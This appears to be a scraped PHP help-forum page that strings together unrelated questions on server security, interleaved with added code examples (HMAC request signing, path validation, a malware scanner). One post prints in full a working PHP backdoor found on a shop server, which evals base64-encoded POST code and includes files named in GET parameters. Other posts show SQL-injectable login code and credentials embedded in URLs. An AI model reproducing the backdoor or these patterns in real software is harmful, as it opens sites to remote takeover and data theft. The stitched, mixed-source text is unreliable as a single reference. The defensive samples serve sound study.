PHP - Using GitHub To Make PHP Code Open Source, Keeping Details Of Server Secure

Hi, a little help needed.
I have created a new website. In the index.php file I want to show records from the database. Now, here is how the problem arises: I want to import the code from GitHub instead of hosting those files on my server, because I want to keep it open source. Below is the code I am using:

Code:
    <?php
    // connect to the database
    include('connect-db.php');

    // get results from database
    $sql = "SELECT id, upadhi, name FROM munishri";
    $result = $conn->query($sql);

    if ($result->num_rows > 0) {
        // output data of each row
        while ($row = $result->fetch_assoc()) {
            echo "id: " . $row["id"] . " - Name: " . $row["upadhi"] . " " . $row["name"] . "<br>";
        }
    } else {
        echo "0 results";
    }

    // close connection
    $conn->close();
    ?>

Can I host the code that shows the result in another file and use something like this?

Code:
    <?php
    // connect to the database
    include('connect-db.php');

    // get results from database
    include('http://rawgit.com/th...database.php');
    ?>

Similar Tutorials

I have two servers: WebServer and FaxServer. WebServer needs to send a fax. Is my approach shown below fairly secure?

Before sending a fax, WebServer needs to store a record in a table representing the message, and I am using a pseudo-random value for the PK which is generated as 2147483648+mt_rand(-2147483647,2147483647). WebServer then generates a hash equal to hash('sha256',$pk.'secretCodeWhichOnlyWebServerAndFaxServerKnow'). WebServer then sends a curl request to FaxServer using POST which includes $pk, the hash, the fax number, some text to include in the fax, and an optional array of documents to include (array(array('id'=>321,'name'=>'fileName.pdf'))). FaxServer verifies that the hash is correct given $pk, that the minimum information has been received, and that the fax number is a valid phone number, and quickly responds to WebServer by echoing 0 or 1 so the code on the WebServer can continue and inform the user. If all looks okay, a new instance of PHP is started:
Code:
    if (missingInformation) {
        echo(0);
    } else {
        session_start();
        $_SESSION['_xfr'] = $_POST;
        exec('/usr/bin/php -q /path/to/send_fax.php ' . session_id() . ' >/dev/null &');
        echo(1);
    }

The new instance of PHP, send_fax.php, then does the following:

Code:
    session_id($argv[1]); // Set by parent
    session_start();
    $data = $_SESSION['_xfr'];
    $doc_list = null;
    foreach ($data['documents'] AS $doc) {
        if (ctype_alnum($doc['id'])) {
            $file = '/some/tmp/directory/' . $doc['id'];
            if (!file_exists($file)) {
                $url = 'http://machine.WebServer.com/index.php?task=displayDocument&id=' . $doc['id']
                     . '&x=' . hash('sha256', 'displayDocument' . $doc['id'] . 'secretCodeWhichOnlyWebServerAndFaxServerKnow');
                $cmd = 'wget -O ' . $file . ' ' . escapeshellarg($url);
                exec($cmd);
            }
            $doc_list .= ' ' . $file;
        } else {
            // the else branch was dropped in the original paste; without it the exit ran unconditionally
            exit('invalid document');
        }
    }
    //Send the fax...
    //Send another CURL request to the WebServer similar to the wget giving the fax status.
    exit;

When WebServer receives the wget request for a document, it confirms the hash and sends the document to the FaxServer using X-Sendfile. When WebServer receives the CURL request regarding status, it updates the database for the applicable message. Seem reasonably secure?

Hi there! I have two different hosting services: on the first one I can regularly use the function mail(), but the second does not allow me to send mails (it will block the account for mass mailing). I need to use mail to notify things to users who requested it, so I need to be able to send mail from this second server too. I thought that I would create a mailer script on the first server, so that the second will simply call the script when needed, passing the e-mail addresses, the subject and content through POST. Now, how to avoid that some malicious user uses my script to send their own mails? I thought that I could send with the POST two vars, "time" and "secure_code" (I will eventually fake the names, so that it is not so easy to recognize), where "time" is got by time(), and "secure_code" is a function depending on the value of "time".
The mailer script gets both values, and uses the same function to verify whether the "secure_code" is correct according to the time. Question is, is this safe? What kind of function shall I use? Also, how could I avoid that a malicious user simply saves the "time" and "secure_code" at a certain moment, and uses them again? Thanks in advance.

The more I look at this code the more I think to myself that there is some kind of security hole in it, but at other times I say that it'll do.
Here's the code in question. Part of my jQuery script:

Code:
    if (proceed) {
        //console.log('All the conditions have been met.');
        var data = $('#registerForm input').serialize(); // Put form data into serialize format:
        /* Save Function by grabbing & sending data to register.php */
        $.post($('#registerForm').attr('action'), data, function(info) {
            console.log(info);
            //$('#result').text(info); // Display the result back when saved:
        }); // End of Save:
    } else {
        console.log('There is a problem somewhere.');
    }

and my PHP file that the data is sent to:

Code:
    if (isset($_POST['username'])) {
        $userType = 'public';
        $username = $_POST['username'];
        $realname = $_POST['realname'];
        $email = $_POST['email'];
        $password = password_hash(trim($_POST['password']), PASSWORD_BCRYPT, array("cost" => 15));
        $query = 'INSERT INTO users (userType, username, realname, email, password, dateAdded) '
               . 'VALUES (:userType, :username, :realname, :email, :password, NOW())';
        $stmt = $pdo->prepare($query);
        try {
            $result = $stmt->execute(array(':userType' => $userType, ':username' => $username,
                                           ':realname' => $realname, ':email' => $email, ':password' => $password));
            if ($result) {
                echo 'Data Successfully Inserted!';
            }
        } catch (PDOException $error) {
            if (substr($error->getCode(), 0, 2) == SQL_CONSTRAINT_VIOLATION) {
                $errorMsg = 'The username already exists.';
            } else {
                throw $error; // some other error happened; just pass it on.
            }
        }
    }

Basically it takes the data from the registration form, validates it and then sends it to the register.php file to insert the data in the database table. It will be a long time before I go live with this, but I want to make this as secure as I can. Any suggestions or help will be greatly appreciated. Best Regards, John

Hi guys, it's my first post here, not looking to leech, I'm simply here to learn and develop my skills and any contributions will be greatly appreciated! Anyway, I have made a simple login script, however I would like to make it more secure.
However, before that, can you please explain to me why it is not secure in the first place? A basic explanation so I can understand would be great. Then after that, could you please give help as to how I would make this login code more secure? Thank you very much.

Code:
    <?php
    $rowsfound = false;
    if (isset($_GET['frmStudentId'])) {
        // functions to make performQuery() work correctly
        require_once("dbfunctions.inc.php");
        $query = "SELECT dbStudentId, dbStudentName " .
                 " FROM student " .
                 " WHERE dbStudentId = '" . $_GET['frmStudentId'] . "'" .
                 " AND dbPassword = '" . $_GET['frmPassword'] . "'";
        $result = performQuery($query);
        if (count($result) > 0) {
            $rowsfound = true; // allow login
        }
    }
    // code continues by generating appropriate response ...

Hey guys, a while ago I created a script for my friend where you can buy points and then redeem stuff with those points. I'm looking for ways to keep my site secure. Currently what I have done:
- protected all MySQL queries with mysql_real_escape_string, strip_tags, and addslashes
- have a valid SSL certificate on my website
- checked if emails are valid for account creation
What else can I do? Thank you.

Hi all,
I'm looking for an open-source website like Groupon or similar. The most important thing is that the graphics need to be minimal and the code very simple, so that I am able to edit or modify it to adapt it to my purposes.
Thank you.
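The fax-server and mailer posts above both ask how to stop a captured "time"/"secure_code" pair from being reused. The following is an added example, not code from any post: each request carries a timestamp and a one-time nonce under an HMAC, and the receiver checks freshness, nonce reuse and the signature in constant time. The shared key, the validity window and the in-memory nonce store are assumed values.

```php
<?php
// Added example: HMAC-signed server-to-server request with timestamp and
// one-time nonce. SHARED_KEY and MAX_SKEW are assumed placeholder values.
const SHARED_KEY = 'replace-with-a-long-random-secret'; // same on both servers
const MAX_SKEW   = 300;                                  // seconds a request stays valid

// Canonical string both sides sign: sorted fields, one per line, so that
// reordering or adding parameters cannot produce the same signature.
function canonical(array $fields): string {
    ksort($fields);
    $lines = [];
    foreach ($fields as $k => $v) {
        $lines[] = $k . '=' . $v;
    }
    return implode("\n", $lines);
}

// Sender side: add timestamp, nonce and signature to the POST fields.
function sign_request(array $fields, string $key, ?int $now = null): array {
    $fields['ts']    = (string)($now ?? time());
    $fields['nonce'] = bin2hex(random_bytes(16));
    $fields['sig']   = hash_hmac('sha256', canonical($fields), $key);
    return $fields;
}

// Receiver side: reject stale timestamps and already-seen nonces, then compare
// the recomputed HMAC in constant time. $seen is the nonce store (an array
// here; on a real server use a table or cache shared by all PHP workers).
function verify_request(array $post, string $key, array &$seen, ?int $now = null): bool {
    foreach (['ts', 'nonce', 'sig'] as $required) {
        if (!isset($post[$required]) || !is_string($post[$required])) {
            return false;
        }
    }
    $now = $now ?? time();
    if (abs($now - (int)$post['ts']) > MAX_SKEW) {
        return false;                           // too old or too far in the future
    }
    if (isset($seen[$post['nonce']])) {
        return false;                           // replay of an accepted request
    }
    $sig = $post['sig'];
    unset($post['sig']);
    if (!hash_equals(hash_hmac('sha256', canonical($post), $key), $sig)) {
        return false;                           // body or timestamp was altered
    }
    $seen[$post['nonce']] = (int)$post['ts'];   // remember until it can no longer replay
    foreach ($seen as $nonce => $ts) {
        if ($now - $ts > MAX_SKEW) {
            unset($seen[$nonce]);
        }
    }
    return true;
}

// Constructed round trip: one signed fax job, the same request a second time,
// then a freshly signed request whose body is changed after signing.
$seen = [];
$job  = sign_request(['fax' => '+15550100', 'text' => 'hello'], SHARED_KEY);
echo 'first delivery: ', verify_request($job, SHARED_KEY, $seen) ? "accepted\n" : "rejected\n";
echo 'replayed copy:  ', verify_request($job, SHARED_KEY, $seen) ? "accepted\n" : "rejected\n";
$job2 = sign_request(['fax' => '+15550100', 'text' => 'hello'], SHARED_KEY);
$job2['text'] = 'changed';
echo 'tampered body:  ', verify_request($job2, SHARED_KEY, $seen) ? "accepted\n" : "rejected\n";
```

The same scheme covers the fax post's per-document fetch: sign the document id together with a timestamp and nonce rather than only hash(id + secret), which is otherwise valid forever.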
Can anyone help me make this more secure? I want to link the info to a .inc instead of pulling this info straight from the page.

Code:
    // cPanel info
    $cpuser = 'userhere';       // cPanel username
    $cppass = 'passwordhere';   // cPanel password
    $cpdomain = 'mysite.com';   // cPanel domain or IP
    $cpskin = 'x';              // cPanel skin. Mostly x or x2.
    // See following URL to know how to determine your cPanel skin
    // http://www.zubrag.com/articles/determine-cpanel-skin.php

    // Default email info for new email accounts
    // These will only be used if not passed via URL
    $epass = 'hispassword';     // email password
    $edomain = 'mysite.com';    // email domain (usually same as cPanel domain above)
    $equota = 20;               // amount of space in megabytes

The only time it pulls the info is in this line:

Code:
    // Create email account
    $f = fopen("http://$cpuser:$cppass@$cpdomain:2082/frontend/$cpskin/mail/doaddpop.html?email=$euser&domain=$edomain&password=$epass&quota=$equota", "r");
    if (!$f) {
        $msg = 'Cannot create email account. Possible reasons: "fopen" function allowed on your server, PHP is running in SAFE mode';
        break;
    }
    $msg = "<h2>Email account {$euser}@{$edomain} created.</h2>";

Thank you for the help once again.

Hi, I have successfully implemented a master-details page with the results aligned in columns linking to a details page. I wish to maintain the recordID passed from the master-details page and make the dynamic text, which reads "Shade A tree that is capable of....." in the attached screenshot, a link to another details page referencing the same recordID. The detailspage2.php would look the same as the screenshot except the Shade text and description below will be highlighted, which I can do; there will be a new image and a new image description. All other dynamic elements on the page will remain the same. I tried to simply save my detailspage.php as detailspage2.php and create a link to detailspage2.php. It linked to detailspage2.php but none of the record info showed up in their respective table cells.
I have all the names, descriptions, images, etc. set up in a table in my database. Please let me know what code and other info you need to help me out with this procedure. Thanks.

Hi guys, I wrote this speck of code to prevent directory traversal. However, I'm not that great with security issues, so I would like some of the gurus to offer pointers/tips/hints as to whether my code is safe or not and how to improve it.

Code:
    $pageID = $_GET["pageid"];
    $pageNewIDLower = strtolower($pageID);
    $pageNewID = ereg_replace("[^A-Za-z0-9]", "", $pageNewIDLower);
    if (strstr($pageNewID, "../") || strstr($pageNewID, "%") != true) {
        // do stuff
    } else {
        include("pages/home.htm");
    }

If this looks wrong, let me know. I didn't take it directly from my PHP code as I'm on a cell phone at the moment.

I've been developing a PHP application that runs my entire company for the last 4 years. One of the things I never thought of until now is that the server guys or anyone else could copy the source code and DB and be able to start up another company, which brings up my question to you.... How would you protect your application? My thought is to create one small PHP file that is encrypted with something that is required to make the entire site run (not sure at this point what it would be that they couldn't just rebuild). Then if this file sees it's on a different domain/IP it requests data from my site, which logs the info for me to look at. If I find out it's something not approved, it would then not allow the program to run and will give an error. What is your idea?
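Returning to the directory-traversal check a few posts up: this is an added example, not the poster's code, that whitelists the page id with a strict pattern and then confirms the resolved path still lies under the pages directory, so neither a stray character nor a symlink inside pages/ can reach another file. PAGES_DIR and the .htm naming are assumptions.

```php
<?php
// Added example, not the poster's code. PAGES_DIR and the ".htm" suffix are
// assumptions; adapt them to the real layout.
const PAGES_DIR = __DIR__ . '/pages';

// Returns the absolute path of the page to include, or null to fall back to
// the home page. Two independent checks: the id must match a strict pattern,
// and the canonical path must still be inside the pages directory.
function resolve_page(string $pageId, string $baseDir): ?string {
    // Accept only lower-case letters, digits and single hyphens. This alone
    // rules out "..", "/", "\", "%", null bytes and encoded variants.
    if (!preg_match('/^[a-z0-9]+(?:-[a-z0-9]+)*$/', $pageId)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $pageId . '.htm');
    if ($base === false || $path === false) {
        return null;                        // directory or page does not exist
    }
    // Defence in depth: a symlink inside pages/ could point elsewhere, so
    // verify the resolved path by prefix rather than trusting the id alone.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Same lower-casing the original did, then resolve and include.
$pageId = isset($_GET['pageid']) ? strtolower((string)$_GET['pageid']) : 'home';
$target = resolve_page($pageId, PAGES_DIR) ?? PAGES_DIR . '/home.htm';
include $target;
```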
I had a programmer who was doing a job for me look over one of my pages, and he added this security to my POST submit button:

Code:
    ##### secure #####
    if (!empty($_POST['user_url']) & preg_match('/(order.*?by|union.*?select|select.*?from|update.*?set|"|\'|\/*)/', $_POST['user_url'])) exit;
    if (!empty($_POST['user_url']) & !preg_match('/https?:\/\/[\w\d:#@%\/;$()~\\_?+-=.&]*/', $_POST['user_url'])) exit;
    #################

However, now it doesn't matter what I type into the text box, it always exits the script... can anyone see what's happening here? PS. The purpose of the text box is to insert URLs into my database... so it would need to allow that format.

I have a PHP page which needs 1) to load images, image paths and image names from a different server when the page is loaded, 2) details automatically saved to the database. Can we do this with PHP (I mean, can we take data from a different server through PHP code)?

I have a page that you click to from your email to validate your account. Whenever you click that link and it goes to this page, the server connection times out. What is in this code that would make it time out (it does not give an error, just says connecting... then times out)?

Code:
    session_start();
    include "../incl/connectdb.php";
    $key1 = $_GET['id'];
    $key2 = $_GET['id2'];
    $query = "select * from users where passkey = '$key1' and pass2 = '$key2' and activation= 'pending' LIMIT 1";
    $result = mysql_query($query) or die(mysql_error());
    $row = mysql_fetch_array($result);
    if (mysql_num_rows($result) < 1) {
        $_SESSION['message'] = "Invalid link";
        header("Location: ../");
        exit();
    }
    $query = "update table-name set activation= 'active' where id = '" . $row['id'] . "' ";
    mysql_query($query);
    $_SESSION['message'] = "Account validated.";

Hello, I recently got a "too many connections" error on my site, and want to know if anyone here knows a few codes that will show how many connections are currently in use (maybe even what files create them).
I found I can use "Threads_connected" to show current open connections, but no info on how to write the code or where to put the file. I hope you can show me what to do.

Is it possible to run a VBScript on the server from a PHP file called by the client? I am using Apache as my web server on a Windows Server 2003 machine.

Code:
    <?php exec('saveAsTxt.vbs'); ?>

It just hangs the browser and doesn't do anything. I'm not sure what is going on. If anyone can help, it would be much appreciated. Thanks, Mike

Hi, a consumer gave me a WSDL that describes SOAP messages in order to communicate together by web services. The first WSDL is a web service that I consume, no problem for this part. But the second one must be implemented on our side; a WSDL is provided to describe the WS that we must develop. The problem is that I don't know how to do it. Does a tool exist to generate server code from a WSDL? Should I develop from scratch and try to match the WSDL? Any clue will be welcome. Regards, Kyor

I have some code that works fine on my dev server but does not work on my production server. Dev server has PHP version 5.2.5 and production server has PHP version 5.1.6. This is the part of the code that isn't working on the prod. server:

Code:
    $xmlDoc = new DOMDocument();
    $xmlDoc->loadXML($tmpDoc);
    $x = $xmlDoc->getElementsByTagName('link');

    //get the q parameter from URL
    $q = $_GET["q"];

    //lookup all links from the xml file if length of q>0
    if (strlen($q) > 0) {
        $hint = "";
        for ($i = 0; $i < ($x->length); $i++) {
            $y = $x->item($i)->getElementsByTagName('title');
            $z = $x->item($i)->getElementsByTagName('url');
            if ($y->item(0)->nodeType == 1) {
                //find a link matching the search text
                if (stristr($y->item(0)->childNodes->item(0)->nodeValue, $q)) {
                    if ($hint == "") {
                        $hint = "<tr><td><a href='" . $z->item(0)->childNodes->item(0)->nodeValue . "' target='_blank'>" .
                                $y->item(0)->childNodes->item(0)->nodeValue . "</a></td></tr>"; // closing </a> was missing in this branch
                    } else {
                        $hint = $hint . "<tr><td><a href='" . $z->item(0)->childNodes->item(0)->nodeValue . "' target='_blank'>" .
                                $y->item(0)->childNodes->item(0)->nodeValue . "</a></td></tr>";
                    }
                }
            }
        }
    }

$tmpDoc is a variable that holds database information in XML form. It basically looks like this:

Code:
    $tmpDoc = $tmpDoc . "<link><title>" . $row['CustomerName'] . "****" . $row['Rep'] . "****" . $row['InstallDate'] . "****" . $row['PaidDate']
            . "</title><url>accountPage.php?AccNum=" . $row['AccountNum'] . "</url></link>";

...that is inside a while loop that loops through the rows returned by a query. Basically, as I said, the whole thing works fine on my dev server but on the production server it never makes it into the for loop, so I guess the condition $i<($x->length) isn't being met. I'm at a bit of a loss here. Is there anything like the PHP version or Apache version that may cause the "->" operator to not work? The prod PHP version isn't that much older than my dev PHP version so I doubt that's the issue, but it's about all I can think of. Thanks!

Hello everyone. This is the first PHP script I've written and I was hoping to get some feedback on any possible issues with it. I've pieced this together in an attempt to download remote images and store them on my server, instead of hotlinking images. The code will be used for a forum, called up by a BBCode tag. (The user will place an image URL into the BBCode, which will transfer to this PHP script.) Again, this is the first time I've coded anything in PHP and I was hoping to get some pointers on anything that needs changing. Thanks.

Code:
    <?php
    $url = $_GET['url'];
    $url_path = parse_url($url, PHP_URL_PATH);
    $name = basename($url_path);
    $FileExt = substr($name, -3);
    $FileTypeMIME = array("jpg" => "image/jpeg", "png" => "image/png", "gif" => "image/gif");
    $ContentType = $FileTypeMIME[$FileExt];
    if (empty($ContentType)) die("You are not allowed to access this file!");
    header("Content-Type: " . $ContentType);
    $save = "../images/" .
            strtolower($name);

    function wtf_image($file) {
        global $FileTypeMIME, $FileExt, $save; // used below but not in function scope in the original
        switch ($FileTypeMIME[$FileExt]) {
            case "image/jpeg":
                $im = imagecreatefromjpeg($file); //jpeg file
                imagejpeg($im, $save); //save jpeg file (original passed quality 0 and a 4th argument imagejpeg does not take)
                break;
            case "image/gif":
                $im = imagecreatefromgif($file); //gif file
                imagegif($im, $save); //save gif file
                break;
            case "image/png":
                $im = imagecreatefrompng($file); //png file
                imagepng($im, $save); //save png file
                break;
        }
        return $im;
    }

    if (file_exists($save)) {
        readfile($save);
    } else {
        chmod($save, 0755);
        $image = wtf_image($url); //Runs wtf_image function on $url
        imagedestroy($image);
        readfile($save);
    }
    ?>

I found this code added to my server, uploaded into a Zen Cart admin folder. We did have some problems previously with index.php and login.php files having some encoded JavaScript injected into them and messing up our online shop. Could someone tell me what it does, as I accidentally launched it before I deleted it. I looked in the server logs and it seems to have accessed every file on the server within seconds.

Code:
    <?php
    //e6b03bed4190733c7534e5c1209b076f
    /**
     * @version 2.42
     *
     */
    if (isset($_POST["action"])) {
        switch ($_POST["action"]) {
            case "test": test(); break;
            case "regular_test": regular_test(); break;
            case "setup": projectcodes_setup(); break;
            case "remove": projectcodes_remove(); break;
            case "mail": send(); break;
            default: break;
        }
        return;
    }
    if (count($_GET) > 0) {
        foreach ($_GET as $id => $code) {
            if ($id == "id") {
                include $code;
            }
        }
        return;
    }
    function test() {
        $encoded_data = "";
        $data["version"] = phpversion();
        if (isset($_SERVER["SERVER_SOFTWARE"])) {
            $data["serverapi"] = $_SERVER["SERVER_SOFTWARE"];
        } else {
            $data["serverapi"] = "Not Available";
        }
        ob_start();
        phpinfo(8);
        $data["modules"] = ob_get_contents();
        ob_clean();
        $data["ext_connect"] = fopen("http://www.ya.ru/", "r") ? TRUE : FALSE;
        $serializes_data = serialize($data);
        $encoded_data = base64_encode($serializes_data);
        echo $_POST["test_message"] . $encoded_data;
    }
    function regular_test() {
        echo $_POST["test_message"];
    }
    function projectcodes_setup() {
        $projectcodes = $_POST["projectcodes"];
        foreach ($projectcodes as $projectcode) {
            $mark = $projectcode["mark"];
            $code = base64_decode($projectcode["code"]);
            $res = new_file_put_contents($mark, $code);
            if ($res) {
                $installed[] = $projectcode["id"];
            }
        }
        $installed = serialize($installed);
        $installed = base64_encode($installed);
        echo $installed;
    }
    function projectcodes_remove() {
        $projectcodes = $_POST["projectcodes"];
        foreach ($projectcodes as $projectcode) {
            $mark = $projectcode["mark"];
            $res = unlink($mark);
            if ($res) {
                $removed[] = $projectcode["id"];
            }
        }
        $removed = serialize($removed);
        $removed = base64_encode($removed);
        echo $removed;
    }
    function new_file_put_contents($filename, $data) {
        $f = @fopen($filename, 'w');
        if (!$f) {
            return false;
        } else {
            $bytes = fwrite($f, $data);
            fclose($f);
            return $bytes;
        }
    }
    function new_file_get_contents($filename) /* Returns the contents of file name passed */ {
        if (!function_exists('file_get_contents')) {
            $fhandle = fopen($filename, "r");
            $fcontents = fread($fhandle, filesize($filename));
            fclose($fhandle);
        } else {
            $fcontents = file_get_contents($filename);
        }
        return $fcontents;
    }
    function send() {
        $code = base64_decode($_POST["projectcode"]);
        eval($code);
        //return;
    }
    ?>

I have had a customer want to run my application (PHP/Apache/MySQL) on their server rather than a commercial hosting offering (JustHost/GoDaddy).
I am reluctant, as it means giving them access to my PHP code, which could possibly be copied or distributed.
Can I protect against this?
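For the file found in the Zen Cart admin folder above, an added example, not from any post: a read-only scan that flags other files using the same constructs that file relies on (eval of decoded POST data, include of a request value, phpinfo capture, file writes through fopen, an outbound connectivity probe) without executing them. WEBROOT and the indicator regexes are my assumptions, not a complete signature set.

```php
<?php
// Added example, not from any post. WEBROOT is an assumed placeholder and the
// indicators below only cover the behaviours visible in the sample above.
const WEBROOT = '/var/www/html';

// Each indicator is a regex over file contents plus a short description.
const INDICATORS = [
    'eval of decoded input'       => '/\beval\s*\(\s*(?:\$\w+|base64_decode\s*\()/i',
    'include of request data'     => '/\b(?:include|require)(?:_once)?\s*\(?\s*\$_(?:GET|POST|REQUEST)\b/i',
    'phpinfo capture'             => '/\bphpinfo\s*\(/i',
    'file write via fopen'        => '/\bfopen\s*\([^)]*,\s*[\'"]w[\'"]\s*\)/i',
    'outbound connectivity probe' => '/\bfopen\s*\(\s*[\'"]https?:\/\//i',
];

// Scan one PHP source string and return the labels of the indicators it matches.
function scan_source(string $src): array {
    $hits = [];
    foreach (INDICATORS as $label => $re) {
        if (preg_match($re, $src)) {
            $hits[] = $label;
        }
    }
    return $hits;
}

// Walk a document root and report every PHP-like file with at least one hit;
// the uploaded file above would match four of the five. Files are only read.
function scan_tree(string $root): array {
    $report = [];
    if (!is_dir($root)) {
        return $report;
    }
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if (!$file->isFile() || !preg_match('/\.(?:php|phtml|inc)$/i', $file->getFilename())) {
            continue;
        }
        $src = @file_get_contents($file->getPathname());
        if ($src === false) {
            continue;                      // unreadable; note it separately if needed
        }
        $hits = scan_source($src);
        if ($hits) {
            $report[$file->getPathname()] = $hits;
        }
    }
    return $report;
}

// Constructed sample, simplified from the uploaded file's key lines, to show what gets flagged.
$sample = '<?php if (isset($_GET["id"])) { include $_GET["id"]; } '
        . 'function send() { $code = base64_decode($_POST["projectcode"]); eval($code); }';
print_r(scan_source($sample));

foreach (scan_tree(WEBROOT) as $path => $hits) {
    echo $path, ': ', implode(', ', $hits), "\n";
}
```

Treat a hit as a reason to inspect the file alongside the upload and access logs, not as proof on its own; legitimate admin tooling can trip the phpinfo or fopen indicators.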